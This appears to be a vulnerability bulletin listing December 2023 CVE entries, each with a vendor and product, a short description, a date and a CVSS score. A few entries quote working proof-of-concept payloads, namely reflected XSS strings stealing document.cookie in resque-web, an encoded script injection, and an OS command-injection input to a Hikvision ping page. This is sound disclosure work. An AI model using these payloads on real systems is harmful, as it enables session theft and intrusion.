[email protected]
hcl_software — hcl_bigfix_mobile/modern_client_managementDue to this vulnerability, the Master operator could potentially incorporate an SVG tag into HTML, leading to an alert pop-up displaying a cookie. To mitigate stored XSS vulnerabilities, a preventive measure involves thoroughly sanitizing and validating all user inputs before they are processed and stored in the server storage.2023-12-216.6CVE-2023-28025
[email protected]
hcl_software — hcl_launchHCL Launch is vulnerable to HTML injection. This vulnerability may allow a user to embed arbitrary HTML tags in the Web UI potentially leading to sensitive information disclosure.2023-12-214.3CVE-2023-45700
[email protected]
hcltech — connectionsHCL Connections is vulnerable to an information disclosure vulnerability which could allow a user to obtain sensitive information they are not entitled to, caused by improper handling of request data.2023-12-156.5CVE-2023-28022
[email protected]
hikvision — intercom_broadcast_systemA vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been classified as problematic. This affects an unknown part of the file access/html/system.html of the component Log File Handler. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-248253 was assigned to this vulnerability.2023-12-176.5CVE-2023-6894
[email protected]
[email protected]
[email protected]
hikvision — intercom_broadcasting_systemA vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.2023-12-176.3CVE-2023-6895
[email protected]
[email protected]
[email protected]
hitachi_energy — rtu500_series_cmuVulnerability exists in SCI IEC 60870-5-104 and HCI IEC 60870-5-104 that affects the RTU500 series product versions listed below. Specially crafted messages sent to the mentioned components are not validated properly and can result in buffer overflow and as final consequence to a reboot of an RTU500 CMU.2023-12-195.9CVE-2023-6711
[email protected]
home_assistant — home_assistantHome Assistant is open source home automation software. Prior to version 2023.12.3, the login page discloses all active user accounts to any unauthenticated browsing request originating on the Local Area Network. Version 2023.12.3 contains a patch for this issue. When starting the Home Assistant 2023.12 release, the login page returns all currently active user accounts to browsing requests from the Local Area Network. Tests showed that this occurs when the request is not authenticated and the request originated locally, meaning on the Home Assistant host local subnet or any other private subnet. The rationale behind this is to make the login more user-friendly and an experience better aligned with other applications that have multiple user-profiles. However, as a result, all accounts are displayed regardless of them having logged in or not and for any device that navigates to the server. This disclosure is mitigated by the fact that it only occurs for requests originating from a LAN address. But note that this applies to the local subnet where Home Assistant resides and to any private subnet that can reach it.2023-12-154.3CVE-2023-50715
[email protected]
[email protected]
ibm — aixIBM AIX 7.2 and 7.3 could allow a non-privileged local user to exploit a vulnerability in the AIX SMB client to cause a denial of service. IBM X-Force ID: 267963.2023-12-226.2CVE-2023-45165
[email protected]
[email protected]
ibm — aixIBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in AIX windows to cause a denial of service. IBM X-Force ID: 267970.2023-12-196.2CVE-2023-45172
[email protected]
[email protected]
ibm — cloud_pak_for_business_automationIBM Cloud Pak for Business Automation 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 may reveal sensitive information contained in application configuration to developer and administrator users. IBM X-Force ID: 264805.2023-12-184.9CVE-2023-40691
[email protected]
[email protected]
ibm — db2_mirror_for_iIBM i 7.3, 7.4, 7.5, IBM i Db2 Mirror for i 7.4 and 7.5 web browser clients may leave clear-text passwords in browser memory that can be viewed using common browser tools before the memory is garbage collected. A malicious actor with access to the victim’s PC could exploit this vulnerability to gain access to the IBM i operating system. IBM X-Force ID: 272532.2023-12-185.3CVE-2023-47741
[email protected]
[email protected]
ibm — informix_jdbcIBM Informix JDBC Driver 4.10 and 4.50 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 259116.2023-12-206.3CVE-2023-35895
[email protected]
[email protected]
ibm — qradar_siemIBM Qradar SIEM 7.5 could allow a privileged user to obtain sensitive domain information due to data being misidentified. IBM X-Force ID: 270372.2023-12-194.9CVE-2023-47146
[email protected]
[email protected]
ibm — security_guardium_key_lifecycle_managerIBM Security Guardium Key Lifecycle Manager 4.3 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 271197.2023-12-205.3CVE-2023-47703
[email protected]
[email protected]
ibm — security_guardium_key_lifecycle_managerIBM Security Guardium Key Lifecycle Manager 4.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 271522.2023-12-205.4CVE-2023-47707
[email protected]
[email protected]
ibm — security_guardium_key_lifecycle_managerIBM Security Guardium Key Lifecycle Manager 4.3 could allow an authenticated user to manipulate username data due to improper input validation. IBM X-Force ID: 271228.2023-12-204.3CVE-2023-47705
[email protected]
[email protected]
ibm — urbancode_deployAn IBM UrbanCode Deploy Agent 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 installed as a Windows service in a non-standard location could be subject to a denial of service attack by local accounts. IBM X-Force ID: 265509.2023-12-206.2CVE-2023-42012
[email protected]
[email protected]
ibm — urbancode_deployIBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 265510.2023-12-205.3CVE-2023-42013
[email protected]
[email protected]
ibm — urbancode_deployIBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 may mishandle input validation of an uploaded archive file leading to a denial of service due to resource exhaustion. IBM X-Force ID: 270799.2023-12-205.3CVE-2023-47161
[email protected]
[email protected]
ibm — urbancode_deployIBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 is vulnerable to HTML injection. This vulnerability may allow a user to embed arbitrary HTML tags in the Web UI potentially leading to sensitive information disclosure. IBM X-Force ID: 265512.2023-12-194.3CVE-2023-42015
[email protected]
[email protected]
idemia — multiple_products
 		When handling contactless cards, usage of a specific function to get additional information from the card which doesn’t check the boundary on the data received while reading. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device2023-12-156.8CVE-2023-33222
a87f365f-9d39-4848-9b3a-58c7cae69cab
infinispan — infinispanA flaw was found in Infinispan’s REST. Bulk read endpoints do not properly evaluate user permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions.2023-12-186.5CVE-2023-3628
[email protected]
[email protected]
[email protected]
infinispan — infinispanA flaw was found in Infinispan’s REST, Cache retrieval endpoints do not properly evaluate the necessary admin permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions.2023-12-184.3CVE-2023-3629
[email protected]
[email protected]
[email protected]
infinispan — infinispan-serverA flaw was found in Infinispan, which does not detect circular object references when unmarshalling. An authenticated attacker with sufficient permissions could insert a maliciously constructed object into the cache and use it to cause out of memory errors and achieve a denial of service.2023-12-184.4CVE-2023-5236
[email protected]
[email protected]
[email protected]
instipod — duouniversalkeycloakauthenticatorAn information disclosure vulnerability exists in the challenge functionality of instipod DuoUniversalKeycloakAuthenticator 1.0.7 plugin. A specially crafted HTTP request can lead to a disclosure of sensitive information. An user login to Keycloak using DuoUniversalKeycloakAuthenticator plugin triggers this vulnerability.2023-12-234.5CVE-2023-49594
[email protected]
[email protected]
insyde — insydeh2oTOCTOU race-condition vulnerability in Insyde InsydeH2O with Kernel 5.2 before version 05.27.29, Kernel 5.3 before version 05.36.29, Kernel 5.4 version before 05.44.13, and Kernel 5.5 before version 05.52.13 allows an attacker to alter data and code used by the remainder of the boot process.2023-12-164.7CVE-2022-24351
[email protected]
[email protected]
iscute — cute_http_file_serverCross Site Scripting (XSS) vulnerability in CuteHttpFileServer v.1.0 and v.2.0 allows attackers to obtain sensitive information via the file upload function in the home page.2023-12-205.4CVE-2023-50639
[email protected]
i̇stanbul_soft_informatics_and_consultancy_limited_company — softomi_geli?mi?_c2c_pazaryeri_yaz?l?m?Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ?stanbul Soft Informatics and Consultancy Limited Company Softomi Geli?mi? C2C Pazaryeri Yaz?l?m? allows Reflected XSS. This issue affects Softomi Geli?mi? C2C Pazaryeri Yaz?l?m?: before 12122023.2023-12-216.1CVE-2023-6122
[email protected]
jetbrains — intellij_ideaIn JetBrains IntelliJ IDEA before 2023.3.2 code execution was possible in Untrusted Project mode via a malicious plugin repository specified in the project configuration2023-12-216.3CVE-2023-51655
[email protected]
jetbrains — youtrackIn JetBrains YouTrack before 2023.3.22268 authorization check for inline comments inside thread replies was missed2023-12-154.3CVE-2023-50871
[email protected]
kaifa — webitr_attendance_systemKaifa Technology WebITR is an online attendance system, it has insufficient validation for user input within a special function. A remote attacker with regular user privilege can exploit this vulnerability to inject arbitrary SQL commands to read database.2023-12-156.5CVE-2023-48395
[email protected]
kaifa — webitr_attendance_systemKaifa Technology WebITR is an online attendance system. A remote attacker with regular user privilege can obtain partial sensitive system information from error message.2023-12-154.3CVE-2023-48393
[email protected]
kashipara_group — hotel_managementHotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The ‘adults’ parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application’s response.2023-12-205.4CVE-2023-49269
[email protected]
[email protected]
kashipara_group — hotel_managementHotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The ‘check_in_date’ parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application’s response.2023-12-205.4CVE-2023-49270
[email protected]
[email protected]
kashipara_group — hotel_managementHotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The ‘check_out_date’ parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application’s response.2023-12-205.4CVE-2023-49271
[email protected]
[email protected]
kashipara_group — hotel_managementHotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The ‘children’ parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application’s response.2023-12-205.4CVE-2023-49272
[email protected]
[email protected]
kodcloud — kodexplorerReflective Cross Site Scripting (XSS) vulnerability in KodeExplorer version 4.51, allows attackers to obtain sensitive information and escalate privileges via the APP_HOST parameter at config/i18n/en/main.php.2023-12-196.1CVE-2023-49489
[email protected]
libtiff — libtiffAn issue was found in the tiffcp utility distributed by the libtiff package where a crafted TIFF file on processing may cause a heap-based buffer overflow leads to an application crash.2023-12-185.5CVE-2023-6228
[email protected]
[email protected]
lightxun — iptv_gatewayA vulnerability was found in Lightxun IPTV Gateway up to 20231208. It has been rated as problematic. This issue affects some unknown processing of the file /ZHGXTV/index.php/admin/index/web_upload_template.html. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248579.2023-12-214.3CVE-2023-7026
[email protected]
[email protected]
[email protected]
linux — kernelA null pointer dereference vulnerability was found in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev() in drivers/net/wireless/ath/ath10k/wmi-tlv.c in the Linux kernel. This issue could be exploited to trigger a denial of service.2023-12-214.4CVE-2023-7042
[email protected]
[email protected]
[email protected]
m-files_corporation — m-files_serverA vulnerable API method in M-Files Server before 23.12.13195.0 allows for uncontrolled resource consumption. Authenticated attacker can exhaust server storage space to a point where the server can no longer serve requests.2023-12-206.5CVE-2023-6910
[email protected]
microsoft — edge_chromiumMicrosoft Edge (Chromium-based) Security Feature Bypass Vulnerability2023-12-154.3CVE-2023-36878
[email protected]
microsoft — windows
 		Windows Local Session Manager (LSM) Denial of Service Vulnerability2023-12-206.5CVE-2022-44684
[email protected]
microweber — microweberBusiness Logic Errors in GitHub repository microweber/microweber prior to 2.0.2023-12-154.3CVE-2023-6832
[email protected]
[email protected]
moxa — iologik_e1200_seriesA weak cryptographic algorithm vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. This vulnerability can help an attacker compromise the confidentiality of sensitive data. This vulnerability may lead an attacker to get unexpected authorization.2023-12-236.5CVE-2023-5962
[email protected]
mozilla — firefoxA `&lt;dialog>` element could have been manipulated to paint content outside of a sandboxed iframe. This could allow untrusted content to display under the guise of trusted content. This vulnerability affects Firefox < 121.2023-12-196.5CVE-2023-6869
[email protected]
[email protected]
mozilla — firefoxBrowser tab titles were being leaked by GNOME to system logs. This could potentially expose the browsing habits of users running in a private tab. This vulnerability affects Firefox < 121.2023-12-196.5CVE-2023-6872
[email protected]
[email protected]
mozilla — firefoxMultiple NSS NIST curves were susceptible to a side-channel attack known as “Minerva”. This attack could potentially allow an attacker to recover the private key. This vulnerability affects Firefox < 121.2023-12-194.3CVE-2023-6135
[email protected]
[email protected]
mozilla — firefoxIn some instances, the user-agent would allow push requests which lacked a valid VAPID even though the push manager subscription defined one. This could allow empty messages to be sent from unauthorized parties. *This bug only affects Firefox on Android.* This vulnerability affects Firefox < 121.2023-12-194.3CVE-2023-6868
[email protected]
[email protected]
mozilla — firefoxApplications which spawn a Toast notification in a background thread may have obscured fullscreen notifications displayed by Firefox. *This issue only affects Android versions of Firefox and Firefox Focus.* This vulnerability affects Firefox < 121.2023-12-194.3CVE-2023-6870
[email protected]
[email protected]
mozilla — firefoxUnder certain conditions, Firefox did not display a warning when a user attempted to navigate to a new protocol handler. This vulnerability affects Firefox < 121.2023-12-194.3CVE-2023-6871
[email protected]
[email protected]
mozilla — firefox/firefox_esr`EncryptingOutputStream` was susceptible to exposing uninitialized data. This issue could only be abused in order to write data to a local disk which may have implications for private browsing mode. This vulnerability affects Firefox ESR < 115.6 and Firefox < 121.2023-12-196.5CVE-2023-6865
[email protected]
[email protected]
[email protected]
[email protected]
mozilla — firefox/firefox_esrThe timing of a button click causing a popup to disappear was approximately the same length as the anti-clickjacking delay on permission prompts. It was possible to use this fact to surprise users by luring them to click where the permission grant button would be about to appear. This vulnerability affects Firefox ESR < 115.6 and Firefox < 121.2023-12-196.1CVE-2023-6867
[email protected]
[email protected]
[email protected]
[email protected]
mozilla — multiple_productsThe `VideoBridge` allowed any content process to use textures produced by remote decoders. This could be abused to escape the sandbox. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-196.5CVE-2023-6860
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
mozilla — multiple_productsWhen resolving a symlink, a race may occur where the buffer passed to `readlink` may actually be smaller than necessary. *This bug only affects Firefox on Unix-based operating systems (Android, Linux, MacOS). Windows is unaffected.* This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-195.3CVE-2023-6857
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
mozilla — thunderbirdThe signature of a digitally signed S/MIME email message may optionally specify the signature creation date and time. If present, Thunderbird did not compare the signature creation date with the message date and time, and displayed a valid signature despite a date or time mismatch. This could be used to give recipients the impression that a message was sent at a different date or time. This vulnerability affects Thunderbird < 115.6.2023-12-194.3CVE-2023-50761
[email protected]
[email protected]
[email protected]
mozilla — thunderbirdWhen processing a PGP/MIME payload that contains digitally signed text, the first paragraph of the text was never shown to the user. This is because the text was interpreted as a MIME message and the first paragraph was always treated as an email header section. A digitally signed text from a different context, such as a signed GIT commit, could be used to spoof an email message. This vulnerability affects Thunderbird < 115.6.2023-12-194.3CVE-2023-50762
[email protected]
[email protected]
[email protected]
mr-corner — amazing_little_pollStored XSS vulnerability in Amazing Little Poll, affecting versions 1.3 and 1.4. This vulnerability allows a remote attacker to store a malicious JavaScript payload in the “lp_admin.php” file in the “question” and “item” parameters. This vulnerability could lead to malicious JavaScript execution while the page is loading.2023-12-204.6CVE-2023-6769
[email protected]
netapp — ontapONTAP 9 versions 9.12.1P8, 9.13.1P4, and 9.13.1P5 are susceptible to a vulnerability which will cause all SAS-attached FIPS 140-2 drives to become unlocked after a system reboot or power cycle or a single SAS-attached FIPS 140-2 drive to become unlocked after reinsertion. This could lead to disclosure of sensitive information to an attacker with physical access to the unlocked drives.2023-12-154.6CVE-2023-27317
[email protected]
netapp — ontap_mediatorONTAP Mediator versions prior to 1.7 are susceptible to a vulnerability that can allow an unauthenticated attacker to enumerate URLs via REST API.2023-12-215.3CVE-2023-27319
[email protected]
nextcloud — security-advisoriesNextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when an attacker manages to get access to an active session of another user via another way, they could delete and modify workflows by sending calls directly to the API bypassing the password confirmation shown in the UI. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available.2023-12-225.4CVE-2023-49791
[email protected]
[email protected]
[email protected]
nextcloud — security-advisoriesNextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when a (reverse) proxy is configured as trusted proxy the server could be tricked into reading a wrong remote address for an attacker, allowing them executing authentication attempts than intended. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available.2023-12-225.3CVE-2023-49792
[email protected]
[email protected]
[email protected]
nextcloud — security-advisoriesThe Nextcloud iOS Files app allows users of iOS to interact with Nextcloud, a self-hosted productivity platform. Prior to version 4.9.2, the application can be used without providing the 4 digit PIN code. Nextcloud iOS Files app should be upgraded to 4.9.2 to receive the patch. No known workarounds are available.2023-12-224.3CVE-2023-49790
[email protected]
[email protected]
[email protected]
openbsd — opensshIn ssh-agent in OpenSSH before 9.6, certain destination constraints can be incompletely applied. When destination constraints are specified during addition of PKCS#11-hosted private keys, these constraints are only applied to the first key, even if a PKCS#11 token returns multiple keys.2023-12-185.5CVE-2023-51384
[email protected]
[email protected]
[email protected]
[email protected]
pedroetb — tts-apiA vulnerability has been found in pedroetb tts-api up to 2.1.4 and classified as critical. This vulnerability affects the function onSpeechDone of the file app.js. The manipulation leads to os command injection. Upgrading to version 2.2.0 is able to address this issue. The patch is identified as 29d9c25415911ea2f8b6de247cb5c4607d13d434. It is recommended to upgrade the affected component. VDB-248278 is the identifier assigned to this vulnerability.2023-12-195.5CVE-2019-25158
[email protected]
[email protected]
[email protected]
[email protected]
phpgurukul — online_notes_sharing_systemA vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /user/add-notes.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248741 was assigned to this vulnerability.2023-12-225.5CVE-2023-7054
[email protected]
[email protected]
[email protected]
phpgurukul — online_notes_sharing_systemA vulnerability was found in PHPGurukul Online Notes Sharing System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /user/manage-notes.php of the component Notes Handler. The manipulation of the argument delid leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248738 is the identifier assigned to this vulnerability.2023-12-214.3CVE-2023-7051
[email protected]
[email protected]
[email protected]
phpgurukul — online_notes_sharing_systemA vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been classified as problematic. This affects an unknown part of the file /user/profile.php. The manipulation of the argument name leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248739.2023-12-224.3CVE-2023-7052
[email protected]
[email protected]
[email protected]
phpgurukul — online_notes_sharing_systemA vulnerability classified as problematic has been found in PHPGurukul Online Notes Sharing System 1.0. Affected is an unknown function of the file /user/profile.php of the component Contact Information Handler. The manipulation of the argument mobilenumber leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-248742 is the identifier assigned to this vulnerability.2023-12-224.3CVE-2023-7055
[email protected]
[email protected]
[email protected]
phpmyfaq — phpmyfaqCross-site Scripting (XSS) – Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17.2023-12-165.4CVE-2023-6889
[email protected]
[email protected]
phpmyfaq — phpmyfaqCross-site Scripting (XSS) – Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17.2023-12-165.4CVE-2023-6890
[email protected]
[email protected]
progress_software_corporation — sitefinityA malicious user could potentially use the Sitefinity system for the distribution of phishing emails.2023-12-204.7CVE-2023-6784
[email protected]
[email protected]
pymedusa — medusaMedusa is an automatic video library manager for TV shows. Versions prior to 1.0.19 are vulnerable to unauthenticated blind server-side request forgery (SSRF). The `testDiscord` request handler in `medusa/server/web/home/handler.py` does not validate the user-controlled `discord_webhook` variable and passes it to the `notifiers.discord_notifier.test_notify` method, then `_notify_discord` and finally `_send_discord_msg` method, which sends a POST request to the user-controlled URL on line 64 in `/medusa/notifiers/discord.py`, which leads to a blind server-side request forgery. This issue allows for crafting POST requests on behalf of the Medusa server. Version 1.0.19 contains a fix for the issue.2023-12-225.3CVE-2023-50258
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
pymedusa — medusaMedusa is an automatic video library manager for TV shows. Versions prior to 1.0.19 are vulnerable to unauthenticated blind server-side request forgery (SSRF). The `testslack` request handler in `medusa/server/web/home/handler.py` does not validate the user-controlled `slack_webhook` variable and passes it to the `notifiers.slack_notifier.test_notify` method, then `_notify_slack` and finally `_send_slack` method, which sends a POST request to the user-controlled URL on line 103 in `/medusa/notifiers/slack.py`, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting POST requests on behalf of the Medusa server. Version 1.0.19 contains a fix for the issue.2023-12-225.3CVE-2023-50259
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
redhat — keycloakA flaw was found in Keycloak. This issue may allow an attacker to steal authorization codes or tokens from clients using a wildcard in the JARM response mode “form_post.jwt” which could be used to bypass the security patch implemented to address CVE-2023-6134.2023-12-186.1CVE-2023-6927
[email protected]
[email protected]
resque — resqueResque (pronounced like “rescue”) is a Redis-backed library for creating background jobs, placing those jobs on multiple queues, and processing them later. resque-web in resque versions before 2.1.0 are vulnerable to reflected XSS through the current_queue parameter in the path of the queues endpoint. This issue has been patched in version 2.1.0.2023-12-216.3CVE-2023-50724
[email protected]
[email protected]
[email protected]
resque — resqueResque is a Redis-backed Ruby library for creating background jobs, placing them on multiple queues, and processing them later. The following paths in resque-web have been found to be vulnerable to reflected XSS: “/failed/?class=<script>alert(document.cookie)</script>” and “/queues/><img src=a onerror=alert(document.cookie)>”. This issue has been patched in version 2.2.1.2023-12-226.3CVE-2023-50725
[email protected]
[email protected]
[email protected]
[email protected]
resque — resqueResque is a Redis-backed Ruby library for creating background jobs, placing them on multiple queues, and processing them later. Reflected XSS issue occurs when /queues is appended with /”><svg%20onload=alert(domain)>. This issue has been patched in version 2.6.0.2023-12-226.3CVE-2023-50727
[email protected]
[email protected]
[email protected]
satellite — satelliteAn arithmetic overflow flaw was found in Satellite when creating a new personal access token. This flaw allows an attacker who uses this arithmetic overflow to create personal access tokens that are valid indefinitely, resulting in damage to the system’s integrity.2023-12-186CVE-2023-4320
[email protected]
[email protected]
silabs — z-wave_software_development_kitA denial of service vulnerability exists in all Silicon Labs Z-Wave controller and endpoint devices running Z-Wave SDK v7.20.3 (Gecko SDK v4.3.3) and earlier. This attack can be carried out only by devices on the network sending a stream of packets to the device.2023-12-156.5CVE-2023-5310
[email protected]
[email protected]
silicon_labs — gsdkAn Observable Timing Discrepancy, Covert Timing Channel vulnerability in Silabs GSDK on ARM potentially allows Padding Oracle Crypto Attack on CBC PKCS7. This issue affects GSDK: through 4.4.0.2023-12-214.6CVE-2023-41097
[email protected]
[email protected]
skupper_operator — skupper_operatorA flaw was found in the Skupper operator, which may permit a certain configuration to create a service account that would allow an authenticated attacker in the adjacent cluster to view deployments in all namespaces in the cluster. This issue permits unauthorized viewing of information outside of the user’s purview.2023-12-186.8CVE-2023-5056
[email protected]
[email protected]
[email protected]
snowflakedb — snowflake-connector-netThe Snowflake .NET driver provides an interface to the Microsoft .NET open source software framework for developing applications. Snowflake recently received a report about a vulnerability in the Snowflake Connector .NET where the checks against the Certificate Revocation List (CRL) were not performed where the insecureMode flag was set to false, which is the default setting. The vulnerability affects versions between 2.0.25 and 2.1.4 (inclusive). Snowflake fixed the issue in version 2.1.5.2023-12-226CVE-2023-51662
[email protected]
[email protected]
softnext — mail_sqr_expertSoftnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a special URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability.2023-12-156.5CVE-2023-48381
[email protected]
softnext — mail_sqr_expertSoftnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a mail deliver-related URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability.2023-12-156.5CVE-2023-48382
[email protected]
softnext — mail_sqr_expertSoftnext Mail SQR Expert is an email management platform, it has inadequate filtering for a specific URL parameter within a specific function. An unauthenticated remote attacker can perform Blind SSRF attack to discover internal network topology base on URL error response.2023-12-155.3CVE-2023-48379
[email protected]
sourcecodester — simple_image_stack_websiteA vulnerability was found in SourceCodester Simple Image Stack Website 1.0. It has been rated as problematic. This issue affects some unknown processing. The manipulation of the argument search with the input sy2ap%22%3e%3cscript%3ealert(1)%3c%2fscript%3etkxh1 leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248255.2023-12-176.1CVE-2023-6896
[email protected]
[email protected]
[email protected]
sourcecodester — simple_student_attendance_systemA vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation of the argument page leads to path traversal: ‘../filedir’. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248749 was assigned to this vulnerability.2023-12-226.3CVE-2023-7058
[email protected]
[email protected]
[email protected]
sudo — sudoA flaw was found in sudo in the handling of ipa_hostname, where ipa_hostname from /etc/sssd/sssd.conf was not propagated in sudo. Therefore, it leads to privilege mismanagement vulnerability in applications, where client hosts retain privileges even after retracting them.2023-12-236.6CVE-2023-7090
[email protected]
[email protected]
[email protected]
systemd-resolved — systemd-resolvedA vulnerability was found in systemd-resolved. This issue may allow systemd-resolved to accept records of DNSSEC-signed domains even when they have no signature, allowing man-in-the-middles (or the upstream DNS resolver) to manipulate records.2023-12-235.9CVE-2023-7008
[email protected]
[email protected]
[email protected]
[email protected]
taiwan-ca — jcicsecuritytoolTAIWAN-CA(TWCA) JCICSecurityTool’s Registry-related functions have insufficient filtering for special characters. An unauthenticated remote attacker can inject malicious script into a webpage to perform XSS (Stored Cross-Site Scripting) attack.2023-12-156.1CVE-2023-48387
[email protected]
tcpreplay — tcpreplayWithin tcpreplay’s tcprewrite, a double free vulnerability has been identified in the tcpedit_dlt_cleanup() function within plugins/dlt_plugins.c. This vulnerability can be exploited by supplying a specifically crafted file to the tcprewrite binary. This flaw enables a local attacker to initiate a Denial of Service (DoS) attack.2023-12-215.5CVE-2023-4256
[email protected]
[email protected]
tongda — tongda_office_anywhereA vulnerability was found in Tongda OA 2017 up to 11.9 and classified as critical. This issue affects some unknown processing of the file general/wiki/cp/ct/view.php. The manipulation of the argument TEMP_ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248567. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-216.3CVE-2023-7020
[email protected]
[email protected]
[email protected]
tongda — tongda_office_anywhereA vulnerability was found in Tongda OA 2017 up to 11.9. It has been classified as critical. Affected is an unknown function of the file general/vehicle/checkup/delete_search.php. The manipulation of the argument VU_ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248568. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-216.3CVE-2023-7021
[email protected]
[email protected]
[email protected]
tongda — tongda_office_anywhereA vulnerability was found in Tongda OA 2017 up to 11.9. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/work_plan/manage/delete_all.php. The manipulation of the argument DELETE_STR leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248569 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-216.3CVE-2023-7022
[email protected]
[email protected]
[email protected]
